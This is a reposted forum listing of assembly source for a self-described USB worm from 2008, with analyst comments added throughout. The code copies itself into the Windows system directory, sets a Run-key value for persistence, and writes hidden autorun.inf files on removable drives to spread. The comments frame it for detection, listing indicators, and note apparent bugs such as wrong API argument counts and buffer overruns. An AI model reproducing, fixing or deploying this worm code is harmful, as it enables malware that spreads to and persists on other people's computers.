FlyFar

illuZ1oN's USB Worm - Source Code - Rohitab - Forums

Jul 4th, 2023
ASM (NASM) 3.80 KB | Cybersecurity | 0 0
  1. ;  W32/USBWorm - illuz1oN 2008
  2. ; Spreads using usb's!
  3. ; Copyright illuz1oN 2008
  4. ; h4ck-y0u.org
  5. ; Compile with FASM!!
  6.  
  7. include "H:\Liam\FASM\INCLUDE\WIN32AX.inc"
  8.  
  9. .data                                       ; data section (WIN32AX.inc extended-header macro)
        ; Analyst notes on the data below.
        ; - The <span class="searchlite">...</span> tags inside several literals look like
        ;   search-highlight markup from the hosting page, not part of the original strings;
        ;   read the literals without the tags (e.g. 'Wormzorz') when using them as indicators.
        ; - Strings of interest for detection: the Run-key path and value name, the two
        ;   executable names, and the autorun.inf file name / "[autorun]" header.
        ; - iMutex, msgTit, msgbox and autoInf are not referenced by any code visible in this listing.
  10.     iMutex db 'USB <span class="searchlite">Worm</span>, illuz1oN', 0   ; mutex-style name; no mutex call is visible in this listing
  11.     regKey db '<span class="searchlite">Worm</span>zorz', 0             ; registry value name pushed for RegSetValueEx
  12.     regPth db 'software\Microsoft\Windows\CurrentVersion\Run',0          ; Run key path pushed for RegOpenKeyEx
  13.     newExe db 'drivers.exe', 0                   ; file name referenced by the spreadN blocks
  14.     msgTit db 'illuz1oN USB <span class="searchlite">Worm</span>!', 0   ; unused in the visible code
  15.     msgbox db 'This <span class="searchlite">worm</span> Has Spread to: ', 0   ; unused in the visible code
  16.     sysName db 'illuz.exe', 0                    ; file name passed to lstrcat together with sysPath
  17.     autoInf db 'autorun.inf', 0                  ; unused in the visible code
  18.     autoRun db '[autorun]', 0                    ; 9 characters + NUL = 10 bytes declared; buffer later passed to WriteFile
        ; NOTE(review): the entry code stores to autoRun+10 .. autoRun+27, which is past the
        ; 10 bytes declared above. Assuming the assembler lays these items out in declaration
        ; order, those stores land on drv1..drv4 and the start of inf1 - confirm on a built sample.
  19.     drv1 db 'A:\', 0                             ; drive roots passed to GetDriveType
  20.     drv2 db 'U:\', 0
  21.     drv3 db 'H:\', 0
  22.     drv4 db 'G:\', 0
  23.     inf1 db 'A:\autorun.inf', 0                  ; per-drive autorun.inf paths passed to CreateFile
  24.     inf2 db 'U:\autorun.inf', 0
  25.     inf3 db 'H:\autorun.inf', 0
  26.     inf4 db 'G:\autorun.inf', 0
  27.     sysPath rb 256d                              ; 256-byte buffer filled by GetSystemDirectory
  28.     myPath rb 256d                               ; 256-byte buffer filled by GetModuleFileName
  29.     reg dd ?                                     ; uninitialised dword; its address is pushed for both registry calls
  30.  
  31. .code                                      ; code section (WIN32AX.inc extended-header macro)
  32. wootwoot:                                  ; label named as the entry point by the `.end wootwoot` line
        ; Entry routine of the sample (32-bit Windows, Win32 API reached through the import table).
        ; Visible sequence: patch bytes after the autoRun string, fetch the running image path and
        ; the system directory, call lstrcat and CopyFile, make two registry calls that reference
        ; the HKLM Run key path, then continue into checkdrive.
        ; Defender view: the intent appears to be self-copy plus Run-key persistence; the value
        ; name (regKey), the Run path (regPth) and the file name (sysName) are the indicators.
        ; NOTE(review): RegOpenKeyEx is given 4 dwords and RegSetValueEx 5, fewer than the
        ; documented parameter counts of those APIs, so the runtime behaviour may not match what
        ; the names suggest. Treat the strings as indicators of intent and confirm the real
        ; artefacts by dynamic analysis in an isolated environment.
  33.     mov byte [autoRun+10d], 13d            ; CR at autoRun+10
  34.     mov byte [autoRun+11d], 10d            ; LF at autoRun+11
  35.     mov dword [autoRun+12d], 'open'        ; the four dword stores spell "open=drivers.exe"
  36.     mov dword [autoRun+16d], '=dri'
  37.     mov dword [autoRun+20d], 'vers'
  38.     mov dword [autoRun+24d], '.exe'        ; last store ends at autoRun+27; autoRun is declared as 10 bytes,
                                                 ; so these writes fall on the data declared after it - TODO confirm layout
  39.     push 256d                              ; buffer size
  40.     push myPath                            ; output buffer
  41.     push 0                                 ; module handle 0
  42.     call [GetModuleFileName]               ; myPath receives the path of the running image
  43.     push 256d                              ; buffer size
  44.     push sysPath                           ; output buffer
  45.     call [GetSystemDirectory]              ; sysPath receives the system directory
  46.     push sysPath                           ; pushed first
  47.     push sysName                           ; pushed last = first parameter under stdcall
  48.     call [lstrcat]                         ; string concatenation on the two buffers above
  49.     push 0                                 ; third parameter: 0
  50.     push sysPath                           ; second parameter
  51.     push myPath                            ; first parameter: the running image path
  52.     call [CopyFile]                        ; return value is not checked
  53.     push reg                               ; address of the reg dword
  54.     push KEY_ALL_ACCESS
  55.     push regPth                            ; Run key path string
  56.     push HKEY_LOCAL_MACHINE
  57.     call [RegOpenKeyEx]                    ; four dwords pushed - see NOTE(review) above
  58.     cmp eax,0
  59.     je exitwoot                            ; leaves when the call returned 0 (0 is ERROR_SUCCESS for the registry APIs)
  60.     push sysPath
  61.     call [lstrlen]                         ; eax = length of the string in sysPath
  62.     cmp eax,0
  63.     je exitwoot                            ; leaves when sysPath is empty
  64.     push eax                               ; length from lstrlen
  65.     push sysPath
  66.     push REG_SZ
  67.     push regKey                            ; value name string
  68.     push reg                               ; address of reg, not the dword stored in it
  69.     call [RegSetValueEx]                   ; five dwords pushed - see NOTE(review) above; result not checked
  70.     call checkdrive                        ; checkdrive is also the next label; the pushed return address is never used
                                                 ; because every visible path ends in ExitProcess
  71.  
  72. checkdrive:                                ; probe four fixed root-path buffers for a removable drive
        ; Calls GetDriveType on drv1..drv4 in turn and jumps to the matching spreadN label on the
        ; first one reported as DRIVE_REMOVABLE; if none matches, control goes to exitwoot.
        ; Only four hard-coded buffers are tested; no drive enumeration is visible.
        ; NOTE(review): the entry code writes to autoRun+10..+27 before this runs; if the data is
        ; laid out in declaration order the drvN buffers no longer hold the declared drive roots
        ; at this point - confirm on a built sample before relying on the letters as indicators.
  73.     push drv1                              ; root path argument
  74.     call [GetDriveType]                    ; eax = drive type
  75.     cmp eax,DRIVE_REMOVABLE
  76.     je spread1                             ; removable -> spread1 (which falls through to spread2..4)
  77.     xor eax,eax                            ; clear eax before the next probe
  78.     push drv2
  79.     call [GetDriveType]
  80.     cmp eax,DRIVE_REMOVABLE
  81.     je spread2
  82.     xor eax,eax
  83.     push drv3
  84.     call [GetDriveType]
  85.     cmp eax,DRIVE_REMOVABLE
  86.     je spread3
  87.     xor eax,eax
  88.     push drv4
  89.     call [GetDriveType]
  90.     cmp eax,DRIVE_REMOVABLE
  91.     je spread4
  92.     call exitwoot                          ; `call`, not `jmp`; exitwoot ends in ExitProcess so nothing returns here
  93.  
  94. spread1:                                   ; autorun.inf writer for the first drive slot (inf1)
        ; Creates the file named by inf1, writes the autoRun buffer to it and closes the handle.
        ; Defender view: the artefact is an autorun.inf created with FILE_ATTRIBUTE_HIDDEN /
        ; CREATE_ALWAYS among the pushed values; nothing in this block copies an executable.
        ; There is no jump or return at the end, so execution continues into spread2.
        ; NOTE(review): six dwords are pushed for CreateFile, while the documented Win32 API takes
        ; seven parameters, so the constants may not reach the parameters their names suggest.
  95.     mov dword [drv1+3d], newExe            ; stores the 4-byte address of newExe at drv1+3 (over drv1's NUL and the bytes after it)
  96.     push 0
  97.     push FILE_ATTRIBUTE_HIDDEN
  98.     push CREATE_ALWAYS
  99.     push 0
  100.     push 0
  101.     push inf1                             ; last push = first parameter: the file name
  102.     call [CreateFile]                     ; handle returned in eax; not checked for failure
  103.     mov ebx, eax                          ; keep the handle across the next call
  104.     push autoRun
  105.     call [lstrlen]                        ; eax = length of autoRun up to its first NUL
                                                 ; NOTE(review): as declared that NUL is at offset 9 and no visible store
                                                 ; overwrites it, so the length would cover '[autorun]' only - confirm
  106.     push 0                                ; fifth parameter: 0
  107.     push 0                                ; fourth parameter: 0 (no bytes-written pointer)
  108.     push eax                              ; byte count from lstrlen
  109.     push autoRun                          ; buffer
  110.     push ebx                              ; file handle
  111.     call [WriteFile]                      ; result not checked
  112.     push ebx
  113.     call [CloseHandle]
  114.     xor ebx,ebx                           ; clear the handle register
  115.     xor eax,eax
  116.  
  117. spread2:                                  ; autorun.inf writer for the second drive slot (inf2)
        ; Same sequence as spread1 with drv2/inf2: create the file named by inf2, write the
        ; autoRun buffer, close the handle. Reached by a jump from checkdrive or by falling
        ; through from spread1; execution then continues into spread3.
        ; NOTE(review): six dwords are pushed for CreateFile, while the documented Win32 API takes
        ; seven parameters, so the constants may not reach the parameters their names suggest.
  118.     mov dword [drv2+3d], newExe           ; stores the 4-byte address of newExe at drv2+3
  119.     push 0
  120.     push FILE_ATTRIBUTE_HIDDEN
  121.     push CREATE_ALWAYS
  122.     push 0
  123.     push 0
  124.     push inf2                             ; last push = first parameter: the file name
  125.     call [CreateFile]                     ; handle returned in eax; not checked for failure
  126.     mov ebx, eax                          ; keep the handle across the next call
  127.     push autoRun
  128.     call [lstrlen]                        ; eax = length of autoRun up to its first NUL
  129.     push 0
  130.     push 0
  131.     push eax                              ; byte count from lstrlen
  132.     push autoRun                          ; buffer
  133.     push ebx                              ; file handle
  134.     call [WriteFile]                      ; result not checked
  135.     push ebx
  136.     call [CloseHandle]
  137.     xor ebx,ebx                           ; clear the handle register
  138.     xor eax,eax
  139.  
  140. spread3:                                  ; autorun.inf writer for the third drive slot (inf3)
        ; Same sequence as spread1 with drv3/inf3: create the file named by inf3, write the
        ; autoRun buffer, close the handle. Reached by a jump from checkdrive or by falling
        ; through from spread2; execution then continues into spread4.
        ; NOTE(review): six dwords are pushed for CreateFile, while the documented Win32 API takes
        ; seven parameters, so the constants may not reach the parameters their names suggest.
  141.     mov dword [drv3+3d], newExe           ; stores the 4-byte address of newExe at drv3+3
  142.     push 0
  143.     push FILE_ATTRIBUTE_HIDDEN
  144.     push CREATE_ALWAYS
  145.     push 0
  146.     push 0
  147.     push inf3                             ; last push = first parameter: the file name
  148.     call [CreateFile]                     ; handle returned in eax; not checked for failure
  149.     mov ebx, eax                          ; keep the handle across the next call
  150.     push autoRun
  151.     call [lstrlen]                        ; eax = length of autoRun up to its first NUL
  152.     push 0
  153.     push 0
  154.     push eax                              ; byte count from lstrlen
  155.     push autoRun                          ; buffer
  156.     push ebx                              ; file handle
  157.     call [WriteFile]                      ; result not checked
  158.     push ebx
  159.     call [CloseHandle]
  160.     xor ebx,ebx                           ; clear the handle register
  161.     xor eax,eax
  162.  
  163. spread4:                                  ; autorun.inf writer for the fourth drive slot (inf4)
        ; Same sequence as spread1 with drv4/inf4: create the file named by inf4, write the
        ; autoRun buffer, close the handle. Reached by a jump from checkdrive or by falling
        ; through from spread3; execution then continues into exitwoot.
        ; NOTE(review): six dwords are pushed for CreateFile, while the documented Win32 API takes
        ; seven parameters, so the constants may not reach the parameters their names suggest.
  164.     mov dword [drv4+3d], newExe           ; stores the 4-byte address of newExe at drv4+3
  165.     push 0
  166.     push FILE_ATTRIBUTE_HIDDEN
  167.     push CREATE_ALWAYS
  168.     push 0
  169.     push 0
  170.     push inf4                             ; last push = first parameter: the file name
  171.     call [CreateFile]                     ; handle returned in eax; not checked for failure
  172.     mov ebx, eax                          ; keep the handle across the next call
  173.     push autoRun
  174.     call [lstrlen]                        ; eax = length of autoRun up to its first NUL
  175.     push 0
  176.     push 0
  177.     push eax                              ; byte count from lstrlen
  178.     push autoRun                          ; buffer
  179.     push ebx                              ; file handle
  180.     call [WriteFile]                      ; result not checked
  181.     push ebx
  182.     call [CloseHandle]
  183.     xor ebx,ebx                           ; clear the handle register
  184.     xor eax,eax
  185.  
  186. exitwoot:                                 ; common exit: reached by jump, by `call`, or by fall-through from spread4
        ; Terminates the process with exit code 0. The sample runs once and exits; no loop,
        ; wait or re-scan of drives is visible in this listing.
  187.     xor eax,eax
  188.     push 0                                ; exit code 0
  189.     call [ExitProcess]                    ; does not return
  190.  
  191. .end wootwoot
Tags: usb worm fasm